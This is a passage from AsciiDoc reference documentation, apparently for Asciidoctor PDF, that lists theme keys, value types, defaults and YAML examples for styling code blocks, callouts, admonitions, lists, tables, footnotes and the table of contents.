set_)\n|code:\n background-color: #f5f5f5\n\n|border-color\n|<<colors,Color>> +\n(default: #eeeeee)\n|code:\n border-color: #cccccc\n\n|border-radius\n|<<values,Number>> +\n(default: _not set_)\n|code:\n border-radius: 4\n\n|border-width\n|<<values,Number>> +\n(default: 0.5)\n|code:\n border-width: 0.75\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|code:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: Courier)\n|code:\n font-family: M+ 1mn\n\n|font-size\n|<<values,Number>> +\n(default: 10.8)\n|code:\n font-size: 11\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|code:\n font-style: italic\n\n|line-height\n|<<values,Number>> +\n(default: 1.2)\n|code:\n line-height: 1.25\n\n|line-gap^[1]^\n|<<values,Number>> +\n(default: 0)\n|code:\n line-gap: 3.8\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: 9)\n|code:\n padding: 11\n\n3+|[#key-prefix-table-cell]*Key Prefix:* <<key-prefix-code-linenum,code-linenum>>^[2]^\n\n|font-color\n|<<colors,Color>> +\n(default: #999999)\n|code:\n linenum-font-color: #ccc\n|===\n. The line-gap property is used to tune the height of the background color applied to a span of block text highlighted using Rouge.\n. The code-linenum category only applies when using Pygments as the source highlighter.\nOtherwise, the style is controlled by the source highlighter theme.\n\n[#keys-callout-numbers]\n=== Callout Numbers\n\nThe keys in this category are used to control the style of callout numbers (i.e., conums) inside verbatim blocks and in callout lists (colists).\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-conum]*Key Prefix:* <<key-prefix-conum,conum>>\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|conum:\n font-color: #b12146\n\n|font-family^[1,2]^\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|conum:\n font-family: M+ 1mn\n\n|font-size^[2]^\n|<<values,Number>> +\n(default: _inherit_)\n|conum:\n font-size: $base-font-size\n\n|font-style^[2]^\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|conum:\n font-style: normal\n\n|line-height^[2]^\n|<<values,Number>> +\n(default: 1.15)\n|conum:\n line-height: 4 \/ 3\n\n|glyphs^[2]^\n|circled {vbar} filled {vbar} Unicode String ranges +\n(default: circled)\n|conum:\n glyphs: \\u0031-\\u0039\n|===\n\n. Currently, the font must contain the circle numbers starting at glyph U+2460.\n. font-family, font-size, font-style, and line-height are only used for markers in a colist.\nThese properties are inherited for conums inside a verbatim block.\n. The font must provide the required glyphs.\nThe glyphs can be specified as a comma-separated list of ranges, where the range values are Unicode numbers (e.g., \\u2460).\n\n[#keys-button]\n=== Button\n\nThe keys in this category apply to a button reference (generated from the inline button macro).\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-button]*Key Prefix:* <<key-prefix-button,button>>\n\n|background-color\n|<<colors,Color>> +\n(default: _not set_)\n|button:\n background-color: #0000ff\n\n|border-color^[1]^\n|<<colors,Color>> +\n(default: _not set_)\n|button:\n border-color: #cccccc\n\n|border-offset^[2]^\n|<<values,Number>> +\n(default: 0)\n|button:\n border-offset: 1.5\n\n|border-radius\n|<<values,Number>> +\n(default: 0)\n|button:\n border-radius: 2\n\n|border-width\n|<<values,Number>> +\n(default: $base-border-width)\n|button:\n border-width: 0.5\n\n|content^[3]^\n|<<quoted-string,Quoted string>> +\n(default: \"%s\")\n|button:\n content: \"[\\u2009%s\\u2009]\"\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|button:\n font-color: #ffffff\n\n|font-family\n|<<fonts,Font family name>> +\n(default: Courier)\n|button:\n font-family: M+ 1mn\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|button:\n font-size: 12\n\n|font-style\n|<<font-styles,Font style>> +\n(default: bold)\n|button:\n font-style: normal\n|===\n. The border is only used if a border color is specified and the border width is not explicitly set to 0.\n. The border offset is the amount that the background and border swells around the text.\nIt does not affect the distance between the formatted phrase and the phrases that surround it.\n. The character sequence `%s` in the content key gets replaced with the button label.\n\n[#keys-key]\n=== Key\n\nThe keys in this category apply to a key reference (generated from the inline kbd macro).\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-key]*Key Prefix:* <<key-prefix-key,key>>\n\n|background-color\n|<<colors,Color>> +\n(default: _not set_)\n|key:\n background-color: #fafafa\n\n|border-color^[1]^\n|<<colors,Color>> +\n(default: _not set_)\n|key:\n border-color: #cccccc\n\n|border-offset^[2]^\n|<<values,Number>> +\n(default: 0)\n|key:\n border-offset: 1.5\n\n|border-radius\n|<<values,Number>> +\n(default: 0)\n|key:\n border-radius: 2\n\n|border-width\n|<<values,Number>> +\n(default: $base-border-width)\n|key:\n border-width: 0.375\n\n|separator^[3]^\n|<<quoted-string,Quoted string>> +\n(default: \"+\")\n|key:\n separator: \"\\u2009+\\u2009\"\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|key:\n font-color: #000\n\n|font-family\n|<<fonts,Font family name>> +\n(default: Courier)\n|key:\n font-family: $base-font-family\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|key:\n font-size: 10.5\n\n|font-style\n|<<font-styles,Font style>> +\n(default: italic)\n|key:\n font-style: normal\n|===\n. The border is only used if a border color is specified and the border width is not explicitly set to 0.\n. The border offset is the amount that the background and border swells around the text.\nIt does not affect the distance between the formatted phrase and the phrases that surround it.\n. The separator is only used for multi-key sequences.\n\n[#keys-menu]\n=== Menu\n\nThe keys in this category apply to the menu label (generated from the inline menu macro).\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-menu]*Key Prefix:* <<key-prefix-menu,menu>>\n\n|caret-content\n|<<quoted-string,Quoted string>> +\n(default: \" \\u203a \")\n|menu:\n caret-content: ' > '\n|===\n\n[#keys-blockquote]\n=== Blockquote\n\nThe keys in this category control the arrangement and style of quote blocks.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-blockquote]*Key Prefix:* <<key-prefix-blockquote,blockquote>>\n\n|border-width^[1]^\n|<<values,Number>> +\n(default: 4)\n|blockquote:\n border-width: 5\n\n|border-color^[1]^\n|<<colors,Color>> +\n(default: #eeeeee)\n|blockquote:\n border-color: #eeeeee\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|blockquote:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|blockquote:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|blockquote:\n font-size: 13\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|blockquote:\n font-style: bold\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|blockquote:\n text-transform: uppercase\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: [6, 12, -6, 14])\n|blockquote:\n padding: [5, 10, -5, 12]\n\n3+|[#key-prefix-blockquote-cite]*Key Prefix:* <<key-prefix-blockquote-cite,blockquote-cite>>\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|blockquote:\n cite:\n font-size: 9\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|blockquote:\n cite:\n font-color: #999999\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|blockquote:\n cite:\n font-family: Noto Serif\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|blockquote:\n cite:\n font-style: bold\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|blockquote:\n cite:\n text-transform: uppercase\n|===\n\n. Only applies to the left side.\n\n[#keys-sidebar]\n=== Sidebar\n\nThe keys in this category control the arrangement and style of sidebar blocks.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-sidebar]*Key Prefix:* <<key-prefix-sidebar,sidebar>>\n\n|background-color\n|<<colors,Color>> +\n(default: #eeeeee)\n|sidebar:\n background-color: #eeeeee\n\n|border-color\n|<<colors,Color>> +\n(default: _not set_)\n|sidebar:\n border-color: #ffffff\n\n|border-radius\n|<<values,Number>> +\n(default: _not set_)\n|sidebar:\n border-radius: 4\n\n|border-width\n|<<values,Number>> +\n(default: _not set_)\n|sidebar:\n border-width: 0.5\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|sidebar:\n font-color: #262626\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|sidebar:\n font-family: M+ 1p\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|sidebar:\n font-size: 13\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|sidebar:\n font-style: italic\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|sidebar:\n text-transform: uppercase\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: [12, 12, 0, 12])\n|sidebar:\n padding: [12, 15, 0, 15]\n\n3+|[#key-prefix-sidebar-title]*Key Prefix:* <<key-prefix-sidebar-title,sidebar-title>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: center)\n|sidebar:\n title:\n align: center\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|sidebar:\n title:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|sidebar:\n title:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|sidebar:\n title:\n font-size: 13\n\n|font-style\n|<<font-styles,Font style>> +\n(default: bold)\n|sidebar:\n title:\n font-style: bold\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|sidebar:\n title:\n text-transform: uppercase\n|===\n\n[#keys-example]\n=== Example\n\nThe keys in this category control the arrangement and style of example blocks.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-example]*Key Prefix:* <<key-prefix-example,example>>\n\n|background-color\n|<<colors,Color>> +\n(default: #ffffff)\n|example:\n background-color: #fffef7\n\n|border-color\n|<<colors,Color>> +\n(default: #eeeeee)\n|example:\n border-color: #eeeeee\n\n|border-radius\n|<<values,Number>> +\n(default: _not set_)\n|example:\n border-radius: 4\n\n|border-width\n|<<values,Number>> +\n(default: 0.5)\n|example:\n border-width: 0.75\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|example:\n font-color: #262626\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|example:\n font-family: M+ 1p\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|example:\n font-size: 13\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|example:\n font-style: italic\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|example:\n text-transform: uppercase\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: [12, 12, 0, 12])\n|example:\n padding: [15, 15, 0, 15]\n|===\n\n[#keys-admonition]\n=== Admonition\n\nThe keys in this category control the arrangement and style of admonition blocks and the icon used for each admonition type.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-admonition]*Key Prefix:* <<key-prefix-admonition,admonition>>\n\n|column-rule-color\n|<<colors,Color>> +\n(default: #eeeeee)\n|admonition:\n column-rule-color: #aa0000\n\n|column-rule-style\n|solid {vbar} double {vbar} dashed {vbar} dotted +\n(default: solid)\n|admonition:\n column-rule-style: double\n\n|column-rule-width\n|<<values,Number>> +\n(default: 0.5)\n|admonition:\n column-rule-width: 0.5\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|admonition:\n font-color: #999999\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|admonition:\n font-family: Noto Sans\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|admonition:\n font-size: $base-font-size-large\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|admonition:\n font-style: italic\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|admonition:\n text-transform: none\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: [0, 12, 0, 12])\n|admonition:\n padding: [0, 12, 0, 12]\n\n3+|[#key-prefix-admonition-label]*Key Prefix:* <<key-prefix-admonition-label,admonition-label>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: center)\n|admonition:\n label:\n align: center\n\n|min-width\n|<<measurement-units,Measurement>> +\n(default: _not set_)\n|admonition:\n label:\n min-width: 48\n\n|padding^[1]^\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: $admonition-padding)\n|admonition:\n padding: [0, 12, 0, 12]\n\n|vertical-align\n|top {vbar} middle {vbar} bottom +\n(default: middle)\n|admonition:\n label:\n vertical-align: top\n\n3+|*Key Prefix:* admonition-label, admonition-label-<name>^[2]^\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|admonition:\n label:\n font-color: #262626\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|admonition:\n label:\n font-family: M+ 1p\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|admonition:\n label:\n font-size: 12\n\n|font-style\n|<<font-styles,Font style>> +\n(default: bold)\n|admonition:\n label:\n font-style: bold_italic\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: uppercase)\n|admonition:\n label:\n text-transform: lowercase\n\n3+|[#key-prefix-admonition-icon]*Key Prefix:* <<key-prefix-admonition-icon,admonition-icon-<name> >>^[2]^\n\n|name\n|<icon set>-<icon name>^[3]^ +\n(default: _not set_)\n|admonition:\n icon:\n tip:\n name: fas-fire\n\n|stroke-color\n|<<colors,Color>> +\n(default: caution=#bf3400; important=#bf0000; note=#19407c; tip=#111111; warning=#bf6900)\n|admonition:\n icon:\n important:\n stroke-color: ff0000\n\n|size\n|<<values,Number>> +\n(default: 24)\n|admonition:\n icon:\n note:\n size: 24\n|===\n\n. The top and bottom padding values are ignored on admonition-label-padding.\n. `<name>` can be `note`, `tip`, `warning`, `important`, or `caution`.\nThe subkeys in the icon category cannot be flattened (e.g., `tip-name: far-lightbulb` is not valid syntax).\n. Required.\nSee the `.yml` files in the https:\/\/github.com\/jessedoyle\/prawn-icon\/tree\/master\/data\/fonts[prawn-icon repository] for a list of valid icon names.\nThe prefix (e.g., `fas-`) determines which font set to use.\n\n[#keys-image]\n=== Image\n\nThe keys in this category control the arrangement of block images.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-image]*Key Prefix:* <<key-prefix-image,image>>\n\n|align\n|<<image-alignments,Image alignment>> +\n(default: left)\n|image:\n align: left\n\n|width^[1]^\n|<<measurement-units,Measurement>> +\n(default: _not set_)\n|image:\n width: 100%\n|===\n\n. Only applies to block images.\nIf specified, this value takes precedence over the value of the `width` attribute on the image macro, but not over the value of the `pdfwidth` attribute.\n\n[#keys-svg]\n=== SVG\n\nThe keys in this category control the SVG integration.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-image]*Key Prefix:* <<key-prefix-svg,svg>>\n\n|fallback_font_family^[1]^\n|<<fonts,Font family name>> +\n(default: $base-font-family)\n|svg:\n fallback_font_family: Times-Roman\n|===\n. The fallback font family is only used when the font family in the SVG does not map to a known font name from the font catalog.\n\n[#keys-lead]\n=== Lead\n\nThe keys in this category control the styling of lead paragraphs.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-lead]*Key Prefix:* <<key-prefix-lead,lead>>\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|lead:\n font-color: #262626\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|lead:\n font-family: M+ 1p\n\n|font-size\n|<<values,Number>> +\n(default: 13.5)\n|lead:\n font-size: 13\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|lead:\n font-style: bold\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|lead:\n text-transform: uppercase\n\n|line-height\n|<<values,Number>> +\n(default: 1.4)\n|lead:\n line-height: 1.4\n|===\n\n[#keys-abstract]\n=== Abstract\n\nThe keys in this category control the arrangement and style of the abstract.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-abstract]*Key Prefix:* <<key-prefix-abstract,abstract>>\n\n|font-color\n|<<colors,Color>> +\n(default: $base-font-color)\n|abstract:\n font-color: #5c6266\n\n|font-size\n|<<values,Number>> +\n(default: 13.5)\n|abstract:\n font-size: 13\n\n|font-style\n|<<font-styles,Font style>> +\n(default: $base-font-style)\n|abstract:\n font-style: italic\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: $base-text-transform)\n|abstract:\n text-transform: uppercase\n\n|line-height\n|<<values,Number>> +\n(default: 1.4)\n|abstract:\n line-height: 1.4\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: 0)\n|abstract:\n padding: [0, 12, 0, 12]\n\n3+|[#key-prefix-abstract-title]*Key Prefix:* <<key-prefix-abstract-title,abstract-title>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: center)\n|abstract:\n title:\n align: center\n\n|font-color\n|<<colors,Color>> +\n(default: $base-font-color)\n|abstract:\n title:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: $base-font-family)\n|abstract:\n title:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: $base-font-size)\n|abstract:\n title:\n font-size: 13\n\n|font-style\n|<<font-styles,Font style>> +\n(default: bold)\n|abstract:\n title:\n font-style: bold\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: $base-text-transform)\n|abstract:\n title:\n text-transform: uppercase\n|===\n\n[#keys-thematic-break]\n=== Thematic Break\n\nThe keys in this category control the style of thematic breaks (aka horizontal rules).\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-thematic-break]*Key Prefix:* <<key-prefix-thematic-break,thematic-break>>\n\n|border-color\n|<<colors,Color>> +\n(default: #eeeeee)\n|thematic-break:\n border-color: #eeeeee\n\n|border-style\n|solid {vbar} double {vbar} dashed {vbar} dotted +\n(default: solid)\n|thematic-break:\n border-style: dashed\n\n|border-width\n|<<measurement-units,Measurement>> +\n(default: 0.5)\n|thematic-break:\n border-width: 0.5\n\n|margin-top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|thematic-break:\n margin-top: 6\n\n|margin-bottom\n|<<measurement-units,Measurement>> +\n(default: $vertical-spacing)\n|thematic-break:\n margin-bottom: 18\n|===\n\n[#keys-description-list]\n=== Description List\n\nThe keys in this category control the arrangement and style of definition list items (terms and descriptions).\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-description-list]*Key Prefix:* <<key-prefix-description-list,description-list>>\n\n|term-font-style\n|<<font-styles,Font style>> +\n(default: bold)\n|description-list:\n term-font-style: italic\n\n|term-spacing\n|<<measurement-units,Measurement>> +\n(default: 4)\n|description-list:\n term-spacing: 5\n\n|description-indent\n|<<values,Number>> +\n(default: 30)\n|description-list:\n description-indent: 15\n|===\n\n[#keys-outline-list]\n=== Outline List\n\nThe keys in this category control the arrangement and style of outline list items.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-outline-list]*Key Prefix:* <<key-prefix-outline-list,outline-list>>\n\n|indent\n|<<measurement-units,Measurement>> +\n(default: 30)\n|outline-list:\n indent: 40\n\n|item-spacing\n|<<measurement-units,Measurement>> +\n(default: 6)\n|outline-list:\n item-spacing: 4\n\n|marker-font-color^[1]^\n|<<colors,Color>> +\n(default: _inherit_)\n|outline-list:\n marker-font-color: #3c763d\n\n|text-align^[2]^\n|<<text-alignments,Text alignment>> +\n(default: $base-align)\n|outline-list:\n text-align: left\n|===\n\n. Controls the color of the bullet glyph that marks items in unordered lists and the number for items in ordered lists.\n. Controls the alignment of the list text only, not nested content (blocks or lists).\n\n[#keys-ulist]\n=== Unordered List\n\nThe keys in this category control the arrangement and style of unordered list items.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-ulist-marker]*Key Prefix:* <<key-prefix-ulist-marker,ulist-marker>>\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|ulist:\n marker:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|ulist:\n marker:\n font-size: 9\n\n|font-color\n|<<colors,Color>> +\n(default: $outline-list-marker-font-color)\n|ulist:\n marker:\n font-color: #cccccc\n\n|line-height\n|<<values,Number>> +\n(default: $base-line-height)\n|ulist:\n marker:\n line-height: 1.5\n|===\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|*Key Prefix:* ulist-marker-<type>^[1]^\n\n|content\n|<<quoted-string,Quoted string>>\n|ulist:\n marker:\n disc:\n content: \"\\uf140\"\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|ulist:\n marker:\n disc:\n font-family: fas\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|ulist:\n marker:\n disc:\n font-size: 9\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|ulist:\n marker:\n disc:\n font-color: #ff0000\n\n|line-height\n|<<values,Number>> +\n(default: _inherit_)\n|ulist:\n marker:\n disc:\n line-height: 2\n|===\n\n. <type> is one of disc, square, circle, checked, unchecked\n\n[#keys-table]\n=== Table\n\nThe keys in this category control the arrangement and style of tables and table cells.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-table]*Key Prefix:* <<key-prefix-table,table>>\n\n|background-color\n|<<colors,Color>> +\n(default: transparent)\n|table:\n background-color: #ffffff\n\n|border-color\n|<<colors,Color>> +\n(default: #000000)\n|table:\n border-color: #dddddd\n\n|border-style\n|solid {vbar} dashed {vbar} dotted +\n(default: solid)\n|table:\n border-style: solid\n\n|border-width\n|<<values,Number>> +\n(default: 0.5)\n|table:\n border-width: 0.5\n\n|caption-side\n|top {vbar} bottom +\n(default: top)\n|table:\n caption-side: bottom\n\n|caption-max-width\n|fit-content {vbar} none +\n(default: fit-content)\n|table:\n caption-max-width: none\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|table:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|table:\n font-family: Helvetica\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|table:\n font-size: 9.5\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|table:\n font-style: italic\n\n|grid-color\n|<<colors,Color>> +\n(default: $table-border-color)\n|table:\n grid-color: #eeeeee\n\n|grid-style\n|solid {vbar} dashed {vbar} dotted +\n(default: solid)\n|table:\n grid-style: dashed\n\n|grid-width\n|<<values,Number>> +\n(default: $table-border-width)\n|table:\n grid-width: 0.5\n\n3+|[#key-prefix-table-head]*Key Prefix:* <<key-prefix-table-head,table-head>>\n\n\/\/|align\n\/\/|<<text-alignments,Text alignment>> +\n\/\/(default: _inherit_)\n\/\/|table:\n\/\/ head:\n\/\/ align: center\n\n|background-color\n|<<colors,Color>> +\n(default: $table-background-color)\n|table:\n head:\n background-color: #f0f0f0\n\n|border-bottom-color\n|<<colors,Color>> +\n(default: $table-border-color)\n|table:\n head:\n border-bottom-color: #dddddd\n\n|border-bottom-style\n|solid {vbar} dashed {vbar} dotted +\n(default: solid)\n|table:\n head:\n border-bottom-style: dashed\n\n|border-bottom-width\n|<<values,Number>> +\n(default: 1.25)\n|table:\n head:\n border-bottom-width: 1\n\n|font-color\n|<<colors,Color>> +\n(default: $table-font-color)\n|table:\n head:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: $table-font-family)\n|table:\n head:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: $table-font-size)\n|table:\n head:\n font-size: 10\n\n|font-style\n|<<font-styles,Font style>> +\n(default: bold)\n|table:\n head:\n font-style: normal\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|table:\n head:\n text-transform: uppercase\n\n3+|[#key-prefix-table-body]*Key Prefix:* <<key-prefix-table-body,table-body>>\n\n|background-color\n|<<colors,Color>> +\n(default: $table-background-color)\n|table:\n body:\n background-color: #fdfdfd\n\n|stripe-background-color^[1]^\n|<<colors,Color>> +\n(default: #eeeeee)\n|table:\n body:\n stripe-background-color: #efefef\n\n3+|[#key-prefix-table-foot]*Key Prefix:* <<key-prefix-table-foot,table-foot>>\n\n|background-color\n|<<colors,Color>> +\n(default: $table-background-color)\n|table:\n foot:\n background-color: #f0f0f0\n\n|font-color\n|<<colors,Color>> +\n(default: $table-font-color)\n|table:\n foot:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: $table-font-family)\n|table:\n foot:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: $table-font-size)\n|table:\n foot:\n font-size: 10\n\n|font-style\n|<<font-styles,Font style>> +\n(default: normal)\n|table:\n foot:\n font-style: italic\n\n3+|[#key-prefix-table-cell]*Key Prefix:* <<key-prefix-table-cell,table-cell>>\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: 2)\n|table:\n cell:\n padding: 3\n\n3+|[#key-prefix-table-header-cell]*Key Prefix:* <<key-prefix-table-header-cell,table-header-cell>>\n\n\/\/|align\n\/\/|<<text-alignments,Text alignment>> +\n\/\/(default: $table-head-align)\n\/\/|table:\n\/\/ header-cell:\n\/\/ align: center\n\n|background-color\n|<<colors,Color>> +\n(default: $table-head-background-color)\n|table:\n header-cell:\n background-color: #f0f0f0\n\n|font-color\n|<<colors,Color>> +\n(default: $table-head-font-color)\n|table:\n header-cell:\n font-color: #1a1a1a\n\n|font-family\n|<<fonts,Font family name>> +\n(default: $table-head-font-family)\n|table:\n header-cell:\n font-family: Noto Sans\n\n|font-size\n|<<values,Number>> +\n(default: $table-head-font-size)\n|table:\n header-cell:\n font-size: 12\n\n|font-style\n|<<font-styles,Font style>> +\n(default: $table-head-font-style)\n|table:\n header-cell:\n font-style: italic\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: $table-head-text-transform)\n|table:\n header-cell:\n text-transform: uppercase\n|===\n. This key only controls the color that is used for stripes.\nThe appearance of stripes is controlled using the `stripes` table attribute, the `table-stripes` document attribute (since Asciidoctor 2), or the `stripes` document attribute (prior to Asciidoctor 2).\nPermitted attribute values are even, odd, all, and none.\nPrior to Asciidoctor 2, even rows are shaded by default (e.g., `stripes=even`).\nSince Asciidoctor 2, table stripes are not enabled by default (e.g., `stripes=none`).\n\n[#keys-footnotes]\n=== Footnotes\n\nThe keys in this catagory control the style the list of footnotes at the end of the chapter (book) or document (otherwise).\nIf the `footnotes-title` attribute is specified, it is styled as a block caption.\nThe styling of the links is controlled by the global link styles.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-footnotes]*Key Prefix:* <<key-prefix-footnotes,footnotes>>\n\n|font-color\n|<<colors,Color>> +\n(default: $base-font-color)\n|footnotes:\n font-color: #cccccc\n\n|font-size\n|<<values,Number>> +\n(default: 9)\n|footnotes:\n font-size: 8\n\n|font-style\n|<<font-styles,Font style>> +\n(default: $base-font-style)\n|footnotes:\n font-style: italic\n\n|item-spacing\n|<<measurement-units,Measurement>> +\n(default: 3)\n|footnotes:\n item-spacing: 5\n\n|margin-top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|footnotes:\n margin-top: 10\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|footnotes:\n text-transform: lowercase\n|===\n\n[#keys-table-of-contents]\n=== Table of Contents (TOC)\n\nThe keys in this category control the arrangement and style of the table of contents.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-toc]*Key Prefix:* <<key-prefix-toc,toc>>\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|toc:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|toc:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|toc:\n font-size: 9\n\n|font-style\n|<<font-styles,Font style>> +\n\/\/ QUESTION why is the default not inherited?\n(default: normal)\n|toc:\n font-style: bold\n\n|text-decoration\n|none {vbar} underline +\n(default: none)\n|toc:\n text-decoration: underline\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|toc:\n text-transform: uppercase\n\n|line-height\n|<<values,Number>> +\n(default: 1.4)\n|toc:\n line-height: 1.5\n\n|indent\n|<<measurement-units,Measurement>> +\n(default: 15)\n|toc:\n indent: 20\n\n|margin-top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|toc:\n margin-top: 0\n\n3+|[#key-prefix-toc-level]*Key Prefix:* <<key-prefix-toc-level,toc-h<n> >>^[1]^\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|toc:\n h3-font-color: #999999\n\n|font-family\n|<<fonts,Font family name>> 